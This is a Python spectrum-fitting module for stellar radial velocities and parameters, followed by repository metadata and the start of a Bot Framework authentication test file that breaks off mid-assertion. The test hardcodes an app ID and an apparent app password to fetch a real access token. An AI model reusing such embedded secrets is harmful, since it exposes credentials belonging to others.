Get print function to be used locally, allows for easy logging # Turn off the Cannon's info messages tclogger = logging.getLogger('thecannon.utils') tclogger.disabled = True # Set threads if nthreads is not None: os.environ["OMP_NUM_THREADS"] = str(nthreads) os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads) os.environ["MKL_NUM_THREADS"] = str(nthreads) os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads) os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads) t0 = time.time() if verbose: print('Fitting Cannon model to spectrum with parameters: '+', '.join(['Teff','logg','[Fe/H]','RV'])) # Make internal copy spec = spectrum.copy() # Step 1: Prepare the spectrum #----------------------------- # Normalize and mask the spectrum spec = utils.specprep(spec) # Mask out any large positive outliers, e.g. badly subtracted sky lines specm = utils.maskoutliers(spec,verbose=verbose) # Step 2: Load and prepare the Cannon models #------------------------------------------- if models is None: models = cannon.models.copy() models.prepare(specm) ## NOT interpolated onto the observed wavelength scale # Step 3: Get initial RV using cross-correlation with rough sampling of Teff/logg parameter space #------------------------------------------------------------------------------------------------ beststr, xmodel = fit_xcorrgrid_cannon(specm,models,verbose=verbose,maxvel=1000.0) # Step 4: Get better Cannon stellar parameters using initial RV #-------------------------------------------------------------- # put observed spectrum on rest wavelength scale # get cannon model for "best" teff/logg/feh values # run cannon.test() on the spectrum and variances # just shift the observed wavelengths to rest, do NOT interpolate the spectrum #restwave = obs.wave*(1-beststr['vrel']/cspeed) restwave = specm.wave*(1-beststr['vrel']/cspeed) bestmodel = models.get_best_model([beststr['teff'],beststr['logg'],beststr['feh']]) bestmodelinterp = bestmodel.interp(restwave) labels0, cov0, meta0 = bestmodelinterp.test(specm) # Make sure the labels are within the ranges labels0 = labels0.flatten() for i in range(3): labels0[i]=dln.limit(labels0[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1]) bestmodelspec0 = bestmodelinterp(labels0) if verbose is True: print('Initial Cannon stellar parameters using initial RV') printpars(labels0) # Tweak the continuum normalization if notweak is False: specm = tweakcontinuum(specm,bestmodelspec0,usepoly=tpoly,polyorder=tpolyorder) # Mask out very discrepant pixels when compared to the best-fit model specm = utils.maskdiscrepant(specm,bestmodelspec0,verbose=verbose) # Refit the Cannon labels, cov, meta = bestmodelinterp.test(specm) # Make sure the labels are within the ranges labels = labels.flatten() for i in range(3): labels[i]=dln.limit(labels[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1]) bestmodelspec = bestmodelinterp(labels) if verbose is True: print('Initial Cannon stellar parameters using initial RV and Tweaking the normalization') printpars(labels) # Step 5: Improved RV using better Cannon template #------------------------------------------------- wavelog = utils.make_logwave_scale(specm.wave,vel=0.0) # get new wavelength solution obs = specm.interp(wavelog) m = models.get_best_model(labels).interp(wavelog)(labels,rv=0) dwlog = np.median(dln.slope(np.log10(wavelog))) # vrel = ( 10**(xshift*dwlog)-1 )*cspeed maxlag = np.int(np.ceil(np.log10(1+1000.0/cspeed)/dwlog)) maxlag = np.maximum(maxlag,50) outstr2 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag) outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32), ('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32)]) beststr2= np.zeros(1,dtype=outdtype) for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: beststr2[n] = outstr2[n] beststr2['teff'] = labels[0] beststr2['logg'] = labels[1] beststr2['feh'] = labels[2] # Step 6: Improved Cannon stellar parameters #------------------------------------------- restwave = specm.wave*(1-beststr['vrel']/cspeed) bestmodel = models.get_best_model([beststr2['teff'],beststr2['logg'],beststr2['feh']]) bestmodelinterp = bestmodel.interp(restwave) labels2, cov2, meta2 = bestmodelinterp.test(specm) # Make sure the labels are within the ranges labels2 = labels2.flatten() for i in range(3): labels2[i]=dln.limit(labels2[i],bestmodelinterp.ranges[i,0],bestmodelinterp.ranges[i,1]) bestmodelspec2 = bestmodelinterp(labels2) if verbose is True: print('Improved RV and Cannon stellar parameters:') printpars(np.concatenate((labels2,beststr2['vrel'])),[None,None,None,beststr2['vrelerr']]) # Step 7: Least Squares fitting with forward modeling #---------------------------------------------------- # Get best model so far m = models(teff=beststr2['teff'],logg=beststr2['logg'],feh=beststr2['feh'],rv=beststr2['vrel']) # Tweak the continuum if notweak is False: specm = tweakcontinuum(specm,m,usepoly=tpoly,polyorder=tpolyorder) # Get initial estimates initpar = [beststr2['teff'],beststr2['logg'],beststr2['feh'],beststr2['vrel']] initpar = np.array(initpar).flatten() lsout, lsmodel = fit_lsq_cannon(specm,models,initpar=initpar,verbose=verbose) lspars = lsout['pars'][0] lsperror = lsout['parerr'][0] # Step 8: Run fine grid in RV, forward modeling #---------------------------------------------- maxv = np.maximum(beststr2['vrel'][0],20.0) vel = dln.scale_vector(np.arange(30),lspars[3]-maxv,lspars[3]+maxv) chisq = np.zeros(len(vel)) for i,v in enumerate(vel): m = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=v) chisq[i] = np.sqrt(np.sum(((specm.flux-m.flux)/specm.err)**2)/(specm.npix*specm.norder)) vel2 = dln.scale_vector(np.arange(300),lspars[3]-maxv,lspars[3]+maxv) chisq2 = dln.interp(vel,chisq,vel2) bestind = np.argmin(chisq2) finerv = vel2[bestind] finechisq = chisq2[bestind] if verbose is True: print('Fine grid best RV = %5.2f km/s' % finerv) print('chisq = %5.2f' % finechisq) # Final parameters and uncertainties (so far) fpars = lspars fperror = lsperror fpars[3] = finerv fchisq = finechisq fmodel = models(teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=finerv) # Step 9: MCMC #-------------- if (mcmc is True) | (cornername is not None): mcout, mcmodel = fit_mcmc_cannon(specm,models,fpars,verbose=verbose,cornername=cornername) # Use these parameters fpars = mcout['pars'][0] fperror = mcout['parerr'][0] fchisq = mcout['chisq'][0] fmodel = mcmodel # Construct the output #--------------------- bc = specm.barycorr() # Check if we should apply the barycentric correction # some spectra already this applied to the wavelength solution nobc = False if hasattr(spec,'nobc'): nobc = spec.nobc # Apply barycentric correction if nobc is False: vhelio = fpars[3] + bc else: vhelio = fpars[3] if verbose is True: print('NOT applying Barycentric Correction') if verbose is True: print('Final parameters:') printpars(fpars[0:3],fperror[0:3]) print('Vhelio = %6.2f +/- %5.2f km/s' % (vhelio,fperror[3])) print('BC = %5.2f km/s' % bc) print('chisq = %5.2f' % fchisq) dtype = np.dtype([('vhelio',np.float32),('vrel',np.float32),('vrelerr',np.float32), ('teff',np.float32),('tefferr',np.float32),('logg',np.float32),('loggerr',np.float32), ('feh',np.float32),('feherr',np.float32),('chisq',np.float32),('bc',np.float32)]) out = np.zeros(1,dtype=dtype) out['vhelio'] = vhelio out['vrel'] = fpars[3] out['vrelerr'] = fperror[3] out['teff'] = fpars[0] out['tefferr'] = fperror[0] out['logg'] = fpars[1] out['loggerr'] = fperror[1] out['feh'] = fpars[2] out['feherr'] = fperror[2] out['chisq'] = fchisq out['bc'] = bc # Make diagnostic figure if figfile is not None: # Apply continuum tweak to original spectrum as well cratio = specm.cont/spec.cont orig = spec.copy() orig.flux /= cratio orig.err /= cratio orig.cont *= cratio # Make the diagnostic figure specfigure(figfile,specm,fmodel,out,original=orig,verbose=verbose) # How long did this take if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0)) # Return the prpared models if retpmodels is True: return out, fmodel, specm, models return out, fmodel, specm def multifit_lsq_cannon(speclist,modlist,initpar=None,verbose=False): """ Least Squares fitting with forward modeling of multiple spectra simultaneously. Parameters ---------- speclist : Spec1D object List of the observed spectra to match. modlist : list of Doppler Cannon models A list of the prepare Doppler Cannon models to use, one set for each observed spectrum. initpar : numpy array, optional Initial estimate for [teff, logg, feh, RV], optional. verbose : bool, optional Verbose output of the various steps. This is False by default. Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. bmodel : Spec1D object The best-fitting Cannon model spectrum (as Spec1D object). Example ------- .. code-block:: python out, bmodel = multifit_lsq(speclist,modlist,initpar) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging nspec = len(speclist) ## Prepare the spectrum ##----------------------------- ## normalize and mask spectrum #if spec.normalized is False: spec.normalize() #if spec.mask is not None: # # Set errors to high value, leave flux alone # spec.err[spec.mask] = 1e30 ## Load and prepare the Cannon models ##------------------------------------------- #if models is None: models = cannon.models.prepare(spec) # Get initial estimates npar = 3+nspec if initpar is None: initpar = np.zeros(npar,float) initpar[0:3] = np.array([6000.0, 2.5, -0.5]) # Calculate the bounds lbounds = np.zeros(npar,float)+1e5 ubounds = np.zeros(npar,float)-1e5 for p in modlist[0]: lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1)) ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1)) lbounds[3:] = -1000 ubounds[3:] = 1000 bounds = (lbounds, ubounds) # function to use with curve_fit def multispec_interp(x,*argv): """ This returns the interpolated model for a given spectrum.""" # The "models" and "spec" must already exist outside of this function #print(argv) teff = argv[0] logg = argv[1] feh = argv[2] vrel = argv[3:] npix = len(x) nspec = len(vrel) flux = np.zeros(npix,float) cnt = 0 for i in range(nspec): npx = speclist[i].npix*speclist[i].norder m = modlist[i]([teff,logg,feh],rv=vrel[i]) if m is not None: flux[cnt:cnt+npx] = m.flux.T.flatten() else: flux[cnt:cnt+npx] = 1e30 cnt += npx return flux def multispec_interp_jac(x,*argv): """ Compute the Jacobian matrix (an m-by-n matrix, where element (i, j) is the partial derivative of f[i] with respect to x[j]). """ # We only have to recompute the full model if teff/logg/feh are being modified # otherwise we just modify one spectrum's model #print('jac') #print(argv) relstep = 0.02 npix = len(x) npar = len(argv) teff = argv[0] logg = argv[1] feh = argv[2] vrel = argv[3:] # Initialize jacobian matrix jac = np.zeros((npix,npar),float) # Model at current values f0 = multispec_interp(x,*argv) # Compute full models for teff/logg/feh for i in range(3): pars = np.array(copy.deepcopy(argv)) step = relstep*pars[i] pars[i] += step f1 = multispec_interp(x,*pars) # Hit an edge, try the negative value instead nbd = np.sum(f1>1000) if nbd>1000: pars = np.array(copy.deepcopy(argv)) step = -relstep*pars[i] pars[i] += step f1 = multispec_interp(x,*pars) jac[:,i] = (f1-f0)/step # Compute model for single spectra nspec = len(speclist) cnt = 0 for i in range(nspec): vrel1 = vrel[i] step = 1.0 vrel1 += step npx = speclist[i].npix*speclist[i].norder m = modlist[i]([teff,logg,feh],rv=vrel1) if m is not None: jac[cnt:cnt+npx,i] = (m.flux.T.flatten()-f0[cnt:cnt+npx])/step else: jac[cnt:cnt+npx,i] = 1e30 cnt += npx return jac # We are fitting 3 stellar parameters and Nspec relative RVs # Put all of the spectra into a large 1D array ntotpix = 0 for s in speclist: ntotpix += s.npix*s.norder wave = np.zeros(ntotpix) flux = np.zeros(ntotpix) err = np.zeros(ntotpix) cnt = 0 for i in range(nspec): sp = speclist[i] npx = sp.npix*sp.norder wave[cnt:cnt+npx] = sp.wave.T.flatten() flux[cnt:cnt+npx] = sp.flux.T.flatten() err[cnt:cnt+npx] = sp.err.T.flatten() cnt += npx # Use curve_fit diff_step = np.zeros(npar,float) diff_step[:] = 0.02 lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds, jac=multispec_interp_jac) #lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds, diff_step=diff_step) #lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds) # If it hits a boundary then the solution won't chance much compared to initpar # setting absolute_sigma=True gives crazy low lsperror values lsperror = np.sqrt(np.diag(lscov)) if verbose is True: print('Least Squares RV and stellar parameters:') printpars(lspars) lsmodel = multispec_interp(wave,*lspars) lschisq = np.sqrt(np.sum(((flux-lsmodel)/err)**2)/len(lsmodel)) if verbose is True: print('chisq = %5.2f' % lschisq) # Put it into the output structure dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)]) out = np.zeros(1,dtype=dtype) out['pars'] = lspars out['parerr'] = lsperror out['parcov'] = lscov out['chisq'] = lschisq return out, lsmodel def jointfit_cannon(speclist,models=None,mcmc=False,snrcut=10.0,saveplot=False,verbose=False, outdir=None,nthreads=None,notweak=False,tpoly=False,tpolyorder=3): """ This fits a Cannon model to multiple spectra of the same star. Parameters ---------- speclist : Spec1D object The observed spectrum to match. models : list of Cannon models, optional A list of Cannon models to use. The default is to load all of the Cannon models in the data/ directory and use those. mcmc : bool, optional Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties. This is only run the individual spectra are being fit. This is False by default. snrcut : int, optional S/N cut to fit individual spectra in the first step. The default is snrcut=10. saveplot : bool, optional Save output plots. verbose : bool, optional Verbose output of the various steps. This is False by default. outdir : str, optional The directory for output files. The default is to use the current directory. nthreads : int, optional The number of threads to use. By default the number of threads is not limited. notweak : boolean, optional Don't tweak the observed continuum using the model. Default is False. tpoly : boolean, optional Use a low-order polynomial fit for continuum tweaking. Default is False, it uses Gaussian smoothing instead. tpolyorder : int, optional Polynomial order to use for continuum tweaking if tpoly=True. Default is 3 (cubic). Returns ------- sumstr : numpy structured array Summary catalog of final best-fit values. final : Final best-fit values for each individual spectrum. bmodel : List of Spec1D object List of best-fitting model spectra. specmlist : list of Spec1D object List of the observed spectrua with discrepant and outlier pixels masked. Example ------- .. code-block:: python sumstr, final, bmodel, specmlist = jointfit_cannon(speclist) """ print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging nspec = len(speclist) t0 = time.time() # Set threads if nthreads is not None: os.environ["OMP_NUM_THREADS"] = str(nthreads) os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads) os.environ["MKL_NUM_THREADS"] = str(nthreads) os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads) os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads) if verbose: print('Jointly fitting Cannon model to '+str(nspec)+' spectra with parameters: '+ ', '.join(['Teff','logg','[Fe/H]'])+' and RV for each spectrum') # If list of filenames input, then load them # Creating catalog of info on each spectrum dt = np.dtype([('filename',np.str,300),('snr',float),('vhelio',float),('vrel',float),('vrelerr',float), ('teff',float),('tefferr',float),('logg',float),('loggerr',float),('feh',float), ('feherr',float),('chisq',float),('bc',float)]) info = np.zeros(nspec,dtype=dt) for n in dt.names: info[n] = np.nan for i,s in enumerate(speclist): info['filename'][i] = s.filename info['snr'][i] = s.snr # Make sure some spectra pass the S/N cut hisnr, nhisnr = dln.where(info['snr']>snrcut) if nhisnr < np.ceil(0.25*nspec): snr = np.flip(np.sort(info['snr'])) snrcut = snr[np.maximum(np.int(np.ceil(0.25*nspec)),np.minimum(4,nspec-1))] if verbose is True: print('Lowering S/N cut to %5.1f so at least 25%% of the spectra pass the cut' % snrcut) # Step 1) Loop through each spectrum and run fit() if verbose is True: print('Step #1: Fitting the individual spectra') specmlist = [] modlist = [] for i in range(len(speclist)): spec = speclist[i].copy() if verbose is True: print('Fitting spectrum '+str(i+1)) print(speclist[i].filename) # Only do this for spectra with S/N>10 or 15 if spec.snr>snrcut: # Save the plot, figure the output figure filename figfile = None if saveplot is True: fdir, base, ext = utils.splitfilename(speclist[i].filename) figfile = base+'_dopfit.png' if outdir is not None: figfile = outdir+'/'+figfile if (outdir is None) & (fdir != ''): figfile = fdir+'/'+figfile # Fit the spectrum out, model, specm, pmodels = fit_cannon(spec,verbose=verbose,mcmc=mcmc,figfile=figfile, retpmodels=True,notweak=notweak,tpoly=tpoly, tpolyorder=tpolyorder) modlist.append(pmodels.copy()) del pmodels specmlist.append(specm.copy()) del specm info['vhelio'][i] = out['vhelio'] info['vrel'][i] = out['vrel'] info['vrelerr'][i] = out['vrelerr'] info['teff'][i] = out['teff'] info['tefferr'][i] = out['tefferr'] info['logg'][i] = out['logg'] info['loggerr'][i] = out['loggerr'] info['feh'][i] = out['feh'] info['feherr'][i] = out['feherr'] info['chisq'][i] = out['chisq'] info['bc'][i] = out['bc'] else: if verbose is True: print('Skipping: S/N=%6.1f below threshold of %6.1f. Loading spectrum and preparing models.' % (spec.snr,snrcut)) modlist.append(cannon.models.copy().prepare(speclist[i])) sp = speclist[i].copy() sp = utils.specprep(sp) # mask and normalize # Mask outliers sp = utils.maskoutliers(sp) specmlist.append(sp) # at least need BC info['bc'][i] = speclist[i].barycorr() if verbose is True: print(' ') # Step 2) Find weighted stellar parameters if verbose is True: print('Step #2: Getting weighted stellar parameters') gd, ngd = dln.where(np.isfinite(info['chisq'])) if ngd>0: pars = ['teff','logg','feh','vhelio'] parerr = ['tefferr','loggerr','feherr','vrelerr'] wtpars = np.zeros(4,float) for i in range(len(pars)): p = info[pars[i]][gd] perr = info[parerr[i]][gd] gdp,ngdp,bdp,nbdp = dln.where(perr > 0.0,comp=True) # Weighted by 1/perr^2 if ngdp>0: if (nbdp>0): perr[bdp] = np.max(perr[gdp])*2 mnp = dln.wtmean(p,perr) wtpars[i] = mnp # Unweighted else: wtpars[i] = np.mean(p) if verbose is True: print('Initial weighted parameters are:') printpars(wtpars) else: wtpars = np.zeros(4,float) wtpars[0] = 6000.0 wtpars[1] = 4.0 wtpars[2] = -0.5 wtpars[3] = 0.0 vscatter0 = 999999. if verbose is True: print('No good fits. Using these as intial guesses:') printpars(wtpars) # Make initial guesses for all the parameters, 3 stellar paramters and Nspec relative RVs initpar1 = np.zeros(3+nspec,float) initpar1[0:3] = wtpars[0:3] # the default is to use mean vhelio + BC for all visit spectra initpar1[3:] = wtpars[3]-info['bc'] # vhelio = vrel + BC # Use the Vrel values from the initial fitting if they are accurate enough gdinit,ngdinit = dln.where(np.isfinite(info['vrel']) & (info['snr']>5)) if ngdinit>0: initpar1[gdinit+3] = info['vrel'][gdinit] # Step 3) Refit all spectra simultaneously fitting stellar parameters and RVs if verbose is True: print(' ') print('Step #3: Fitting all spectra simultaneously') out1, fmodels1 = multifit_lsq_cannon(specmlist,modlist,initpar1) stelpars1 = out1['pars'][0,0:3] stelparerr1 = out1['parerr'][0,0:3] vrel1 = out1['pars'][0,3:] vrelerr1 = out1['parerr'][0,3:] vhelio1 = vrel1+info['bc'] medvhelio1 = np.median(vhelio1) vscatter1 = dln.mad(vhelio1) verr1 = vscatter1/np.sqrt(nspec) if verbose is True: print('Parameters:') printpars(stelpars1) print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio1,verr1)) print('Vscatter = %6.3f km/s' % vscatter1) print(vhelio1) # Step 4) Tweak continua and remove outliers if verbose is True: print(' ') print('Step #4: Tweaking continuum and masking outliers') if notweak is False: for i,spm in enumerate(specmlist): bestm = modlist[i](stelpars1,rv=vrel1[i]) # Tweak the continuum normalization spm = tweakcontinuum(spm,bestm,usepoly=tpoly,polyorder=tpolyorder) # Mask out very discrepant pixels when compared to the best-fit model spm = utils.maskdiscrepant(spm,bestm,verbose=verbose) specmlist[i] = spm.copy() else: if verbose: print('Skipping tweaking') # Step 5) Refit all spectra simultaneously fitting stellar parameters and RVs if verbose is True: print(' ') print('Step #5: Re-fitting all spectra simultaneously') # Initial guesses for all the parameters, 3 stellar paramters and Nspec relative RVs initpar2 = out1['pars'][0] out2, fmodels2 = multifit_lsq_cannon(specmlist,modlist,initpar2) stelpars2 = out2['pars'][0,0:3] stelparerr2 = out2['parerr'][0,0:3] vrel2 = out2['pars'][0,3:] vrelerr2 = out2['parerr'][0,3:] vhelio2 = vrel2+info['bc'] medvhelio2 = np.median(vhelio2) vscatter2 = dln.mad(vhelio2) verr2 = vscatter2/np.sqrt(nspec) if verbose is True: print('Final parameters:') printpars(stelpars2) print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio2,verr2)) print('Vscatter = %6.3f km/s' % vscatter2) print(vhelio2) # Final output structure final = info.copy() final['teff'] = stelpars2[0] final['tefferr'] = stelparerr2[0] final['logg'] = stelpars2[1] final['loggerr'] = stelparerr2[1] final['feh'] = stelpars2[2] final['feherr'] = stelparerr2[2] final['vrel'] = vrel2 final['vrelerr'] = vrelerr2 final['vhelio'] = vhelio2 bmodel = [] totchisq = 0.0 totnpix = 0 for i in range(nspec): pars1 = [final['teff'][i], final['logg'][i], final['feh'][i]] vr1 = final['vrel'][i] sp = specmlist[i] m = modlist[i](pars1,rv=vr1) chisq = np.sqrt(np.sum(((sp.flux-m.flux)/sp.err)**2)/(sp.npix*sp.norder)) totchisq += np.sum(((sp.flux-m.flux)/sp.err)**2) totnpix += sp.npix*sp.norder final['chisq'][i] = chisq bmodel.append(m) totchisq = np.sqrt(totchisq/totnpix) # Average values sumdt = np.dtype([('medsnr',float),('totsnr',float),('vhelio',float),('vscatter',float),('verr',float), ('teff',float),('tefferr',float),('logg',float),('loggerr',float),('feh',float), ('feherr',float),('chisq',float)]) sumstr = np.zeros(1,dtype=sumdt) sumstr['medsnr'] = np.median(info['snr']) sumstr['totsnr'] = np.sqrt(np.sum(info['snr']**2)) sumstr['vhelio'] = medvhelio2 sumstr['vscatter'] = vscatter2 sumstr['verr'] = verr2 sumstr['teff'] = stelpars2[0] sumstr['tefferr'] = stelparerr2[0] sumstr['logg'] = stelpars2[1] sumstr['loggerr'] = stelparerr2[1] sumstr['feh'] = stelpars2[2] sumstr['feherr'] = stelparerr2[2] sumstr['chisq'] = totchisq # Save the best-fitting plots if saveplot is True: if verbose is True: print('') print('Making best-fit plots for each spectrum') pdfnames = [] specfiles = [s.filename for s in speclist] for i,f in enumerate(specfiles): # Figure the output figure filename fdir,base,ext = utils.splitfilename(speclist[i].filename) figname = base+'_dopjointfit.png' if outdir is not None: figname = outdir+'/'+figname if (outdir is None) & (fdir != ''): figname = fdir+'/'+figname # Make the plot spec = speclist[i] specm = specmlist[i] fmodel = bmodel[i] fout = final[i] # Apply continuum tweak to original spectrum as well orig = spec.copy() if orig.normalized is False: orig.normalize() cratio = specm.cont/orig.cont orig.flux /= cratio orig.err /= cratio orig.cont *= cratio specfigure(figname,specm,fmodel,fout,original=orig,verbose=True) # Make a PDF version that we will combine at the end fignamepdf = figname.replace('.png','.pdf') specfigure(fignamepdf,specm,fmodel,fout,original=orig,verbose=False) pdfnames.append(fignamepdf) # Combine the PDFs into one fdir,base,ext = utils.splitfilename(specfiles[0]) combname = base+'_dopjointfit_comb.pdf' # png if outdir is not None: combname = outdir+'/'+combname if (outdir is None) & (fdir != ''): combname = fdir+'/'+combname if os.path.exists(combname): os.remove(combname) cmd = ['gs','-dBATCH','-dNOPAUSE','-q','-sDEVICE=pdfwrite','-sOutputFile='+combname] cmd = cmd+pdfnames try: out = subprocess.call(cmd,stderr=subprocess.STDOUT,shell=False) if verbose: print('Combined plots saved to '+combname) except subprocess.CalledProcessError: raise Exception("Could not combine PDFs with ghostscript") # Delete individual PDFs for fp in pdfnames: os.remove(fp) # How long did this take if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0)) return sumstr, final, bmodel, specmlist ######################### MAIN PROGRAMS ########################### def fit(spectrum,models=None,fitparams=None,fixparams={},payne=False,verbose=False, mcmc=False,figfile=None,cornername=None,retpmodels=False,nthreads=None, timestamp=False,notweak=False,tpoly=False,tpolyorder=3): """ Fit the spectrum. Find the best RV and stellar parameters using the Cannon models. Parameters ---------- spectrum : Spec1D object The observed spectrum to match. models : list of Cannon models or Payne model, optional A list of Cannon models or a Payne model to use. The default is to load the models in the data/ directory and use those. fitparams : list, optional List of Payne labels to fit. fixparams : dict, optional Dictionary of Payne labels to hold fixed. payne : bool, optional Fit a Payne model. By default, a Cannon model is used. verbose : bool, optional Verbose output of the various steps. This is False by default. mcmc : bool, optional Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties. This is False by default. figfile : string, optional The filename for a diagnostic plot showing the observed spectrum, model spectrum and the best-fit parameters. cornername : string, optional The filename for a "corner" plot showing the posterior distributions from the MCMC run. retpmodels : bool, optional Return the prepared models (only if Cannon models used). nthreads : int, optional The number of threads to use. By default the number of threads is not limited. timestamp : boolean, optional Add timestamp in verbose output (if verbose=True). Default is False. notweak : boolean, optional Don't tweak the observed continuum using the model. Default is False. tpoly : boolean, optional Use a low-order polynomial fit for continuum tweaking. Default is False, it uses Gaussian smoothing instead. tpolyorder : int, optional Polynomial order to use for continuum tweaking if tpoly=True. Default is 3 (cubic). Returns ------- out : numpy structured array The output structured array of the final derived RVs, stellar parameters and errors. model : Spec1D object The best-fitting Cannon model spectrum (as Spec1D object). specm : Spec1D object The observed spectrum with discrepant and outlier pixels masked. pmodels : DopplerCannonModelSet The prepared Doppler Cannon models, only if retpmodels=True. Example ------- .. code-block:: python out, model = fit(spec) """ # Set up the logger if timestamp and verbose: logger = dln.basiclogger() logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")) logger.handlers[0].setStream(sys.stdout) builtins.logger = logger # make it available globally across all modules # Cannon model if payne == False: out = fit_cannon(spectrum,models=models,verbose=verbose,mcmc=mcmc,figfile=figfile, cornername=cornername,retpmodels=retpmodels,nthreads=nthreads, notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder) # Payne model else: out = fit_payne(spectrum,model=models,fitparams=fitparams,fixparams=fixparams, verbose=verbose,mcmc=mcmc,figfile=figfile, cornername=cornername,nthreads=nthreads, notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder) # Breakdown logger if timestamp and verbose: del builtins.logger return out def jointfit(speclist,models=None,fitparams=None,fixparams={},mcmc=False,snrcut=10.0, saveplot=False,verbose=False,outdir=None,nthreads=None,payne=False, timestamp=False,notweak=False,tpoly=False,tpolyorder=3): """ This fits a Cannon or Payne model to multiple spectra of the same star. Parameters ---------- speclist : Spec1D object The observed spectrum to match. models : Cannon or Payne model(s), optional A list of Cannon models or Payne model to use. The default is to load all the Cannon or Payne models (depending on if payne=True is set) in the data/ directory and use those. fitparams : list, optional List of Payne labels to fit. fixparams : dict, optional Dictionary of Payne labels to hold fixed. mcmc : bool, optional Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties. This is only run the individual spectra are being fit. This is False by default. snrcut : int, optional S/N cut to fit individual spectra in the first step. The default is snrcut=10. saveplot : bool, optional Save output plots. verbose : bool, optional Verbose output of the various steps. This is False by default. outdir : str, optional The directory for output files. The default is to use the current directory. nthreads : int, optional The number of threads to use. By default the number of threads is not limited. payne : bool, optional Fit a Payne model. By default, a Cannon model is used. timestamp : boolean, optional Add timestamp in verbose output (if verbose=True). Default is False. notweak : boolean, optional Don't tweak the observed continuum using the model. Default is False. tpoly : boolean, optional Use a low-order polynomial fit for continuum tweaking. Default is False, it uses Gaussian smoothing instead. tpolyorder : int, optional Polynomial order to use for continuum tweaking if tpoly=True. Default is 3 (cubic). Returns ------- sumstr : numpy structured array Summary catalog of final best-fit values. final : Final best-fit values for each individual spectrum. bmodel : List of Spec1D object List of best-fitting model spectra. specmlist : list of Spec1D object List of the observed spectrua with discrepant and outlier pixels masked. Example ------- .. code-block:: python sumstr, final, bmodel, specmlist = jointfit(speclist) """ # Set up the logger if timestamp and verbose: logger = dln.basiclogger() logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")) logger.handlers[0].setStream(sys.stdout) builtins.logger = logger # make it available globally across all modules # Cannon model if payne == False: out = jointfit_cannon(speclist,models=models,mcmc=mcmc,snrcut=snrcut, saveplot=saveplot,verbose=verbose,outdir=outdir, nthreads=nthreads,notweak=notweak,tpoly=tpoly, tpolyorder=tpolyorder) # Payne model else: out = jointfit_payne(speclist,model=models,fitparams=fitparams,fixparams=fixparams, mcmc=mcmc,snrcut=snrcut,saveplot=saveplot,verbose=verbose, outdir=outdir,nthreads=nthreads,notweak=notweak,tpoly=tpoly, tpolyorder=tpolyorder) # Breakdown logger if timestamp and verbose: del builtins.logger return out
38.698827
160
0.591468
451e90bea550796fa188607b230a6bfea10dd926
6,865
py
Python
libraries/botframework-connector/tests/test_auth.py
awaemmanuel/botbuilder-python
bcc85a49f1426ccf682205566fd03937ee6d315c
[ "MIT" ]
1
2019-05-31T10:55:15.000Z
2019-05-31T10:55:15.000Z
libraries/botframework-connector/tests/test_auth.py
awaemmanuel/botbuilder-python
bcc85a49f1426ccf682205566fd03937ee6d315c
[ "MIT" ]
null
null
null
libraries/botframework-connector/tests/test_auth.py
awaemmanuel/botbuilder-python
bcc85a49f1426ccf682205566fd03937ee6d315c
[ "MIT" ]
null
null
null
import pytest from botbuilder.schema import Activity from botframework.connector.auth import JwtTokenValidation from botframework.connector.auth import SimpleCredentialProvider from botframework.connector.auth import EmulatorValidation from botframework.connector.auth import ChannelValidation from botframework.connector.auth import MicrosoftAppCredentials class TestAuth: EmulatorValidation.TO_BOT_FROM_EMULATOR_TOKEN_VALIDATION_PARAMETERS.ignore_expiration = True ChannelValidation.TO_BOT_FROM_CHANNEL_TOKEN_VALIDATION_PARAMETERS.ignore_expiration = True @pytest.mark.asyncio async def test_connector_auth_header_correct_app_id_and_service_url_should_validate(self): header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token() credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '') result = await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/') assert result @pytest.mark.asyncio async def test_connector_auth_header_with_different_bot_app_id_should_not_validate(self): header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token() credentials = SimpleCredentialProvider('00000000-0000-0000-0000-000000000000', '') with pytest.raises(Exception) as excinfo: await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/') assert 'Unauthorized' in 